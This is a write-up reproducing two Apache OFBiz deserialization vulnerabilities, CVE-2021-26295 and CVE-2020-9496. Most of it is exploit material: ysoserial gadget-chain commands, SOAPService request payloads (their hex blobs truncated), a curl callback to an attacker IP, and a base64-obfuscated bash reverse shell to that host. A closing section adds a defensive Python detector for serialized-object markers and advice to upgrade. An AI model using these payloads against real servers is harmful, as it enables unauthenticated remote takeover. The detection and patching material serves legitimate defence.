Reproducing two Apache OFBiz deserialization vulnerabilities (CVE-2021-26295 and CVE-2020-9496)

0x00 Overview

OFBiz is a Java-based web framework that includes an entity engine, a service engine and a widget-based UI. It is an e-commerce platform used to build multi-tier, distributed, enterprise-class e-commerce applications for medium and large organizations that run across platforms, databases and application servers.

CVE-2021-26295: RMI deserialization leading to command execution; an unauthenticated attacker can fully take over Apache OFBiz.

CVE-2020-9496: unauthenticated deserialization through the xmlrpc endpoint leading to RCE.

0x01 Affected versions

CVE-2021-26295: Apache OFBiz < 17.12.06

CVE-2020-9496: Apache OFBiz < 17.12.04

0x02 Reproduction

Fingerprint: app="Apache_OFBiz"

CVE-2021-26295

Start the test environment:

    docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz

DNS-callback check:

    POST /webtools/control/SOAPService HTTP/1.1
    ……
    Content-Type: application/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header/>
      <soapenv:Body>
        <ser>
          <map-HashMap>
            <map-Entry>
              <map-Key>
                <cus-obj>ace……e78</cus-obj>
              </map-Key>
              <map-Value>
                <std-String value="http://xxxxxx.dnslog.cn"/>
              </map-Value>
            </map-Entry>
          </map-HashMap>
        </ser>
      </soapenv:Body>
    </soapenv:Envelope>

The cus-obj value in the middle is generated directly with ysoserial:

    java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out

and then converted to hex:

    import binascii

    # Read the serialized object written by ysoserial and print it as a hex string
    filename = 'ofbizhex.out'
    with open(filename, 'rb') as f:
        content = f.read()
    print(binascii.hexlify(content).decode())

RCE

    java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'curl http://192.168.56.200:7766/testofbizrce' > b2h10.txt

    POST /webtools/control/SOAPService HTTP/1.1
    ……
    Content-Type: application/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
      <soapenv:Header/>
      <soapenv:Body>
        <ser>
          <map-Map>
            <map-Entry>
              <map-Key>
                <cus-obj>aced00057……00678</cus-obj>
              </map-Key>
              <map-Value>
                <std-String/>
              </map-Value>
            </map-Entry>
          </map-Map>
        </ser>
      </soapenv:Body>
    </soapenv:Envelope>

Reverse shell

    java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}' > b2h11.txt

    POST /webtools/control/SOAPService HTTP/1.1
    ……
    Content-Type: application/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
      <soapenv:Header/>
      <soapenv:Body>
        <ser>
          <map-Map>
            <map-Entry>
              <map-Key>
                <cus-obj>aced00057……000678</cus-obj>
              </map-Key>
              <map-Value>
                <std-String/>
              </map-Value>
            </map-Entry>
          </map-Map>
        </ser>
      </soapenv:Body>
    </soapenv:Envelope>

CVE-2020-9496

Environment: https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/

https://192.168.56.200:8443/myportal/control/main

https://192.168.56.200:8443/webtools/control/xmlrpc

    java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 "touch /tmp/success"……
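Both vectors above deliver a Java serialized object (stream magic 0xACED0005) to an OFBiz service endpoint; in the SOAPService case it sits hex-encoded inside a cus-obj element. The following detector is an added example, not code from the write-up or from OFBiz: it inspects a request path and body and flags these markers. The endpoint paths come from the write-up; the sample body, its truncated hex blob and the Finding type are constructed for this example.

```python
import re
from dataclasses import dataclass

JAVA_SERIAL_MAGIC_HEX = "aced0005"   # 0xACED stream magic + protocol version 5, as hex
JAVA_SERIAL_MAGIC_B64 = "rO0AB"      # the same four bytes as a base64 prefix

# OFBiz endpoints exercised by CVE-2021-26295 (SOAPService) and CVE-2020-9496 (xmlrpc)
WATCHED_PATHS = ("/webtools/control/SOAPService", "/webtools/control/xmlrpc")

CUS_OBJ_RE = re.compile(r"<cus-obj>(.*?)</cus-obj>", re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    path: str
    reason: str
    payload_bytes: int  # decoded size of the serialized blob, 0 when not decodable


def inspect_request(path: str, body: str) -> list[Finding]:
    """Flag OFBiz service requests whose body carries a Java serialized object."""
    if not any(path.startswith(p) for p in WATCHED_PATHS):
        return []
    findings: list[Finding] = []
    for m in CUS_OBJ_RE.finditer(body):
        blob = re.sub(r"\s+", "", m.group(1)).lower()
        is_hex = re.fullmatch(r"[0-9a-f]*", blob) is not None
        if is_hex and blob.startswith(JAVA_SERIAL_MAGIC_HEX):
            findings.append(Finding(path, "cus-obj holds a hex-encoded Java serialized object", len(blob) // 2))
        else:
            # cus-obj is the custom-object deserialization path even when the blob is unreadable
            findings.append(Finding(path, "cus-obj element present", 0))
    if JAVA_SERIAL_MAGIC_B64 in body:
        findings.append(Finding(path, "base64 Java serialization magic (rO0AB) in body", 0))
    return findings


# Constructed sample: the write-up's SOAP shape with a short, truncated serialized header
# ("aced0005" + TC_OBJECT/TC_CLASSDESC bytes + the class name "java.util.HashMap")
SAMPLE_HEX = "aced0005" + "7372000e" + "6a6176612e7574696c2e486173684d6170"
SAMPLE_SOAP = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header/><soapenv:Body><ser><map-HashMap><map-Entry><map-Key>"
    f"<cus-obj>{SAMPLE_HEX}</cus-obj></map-Key><map-Value>"
    '<std-String value="http://example.invalid"/></map-Value>'
    "</map-Entry></map-HashMap></ser></soapenv:Body></soapenv:Envelope>"
)
BENIGN_BODY = "<soapenv:Envelope><soapenv:Body><ser><std-String/></ser></soapenv:Body></soapenv:Envelope>"

if __name__ == "__main__":
    for f in inspect_request("/webtools/control/SOAPService", SAMPLE_SOAP):
        print(f)
```

Detection of this kind complements the fix, which is upgrading past the affected ranges listed in 0x01.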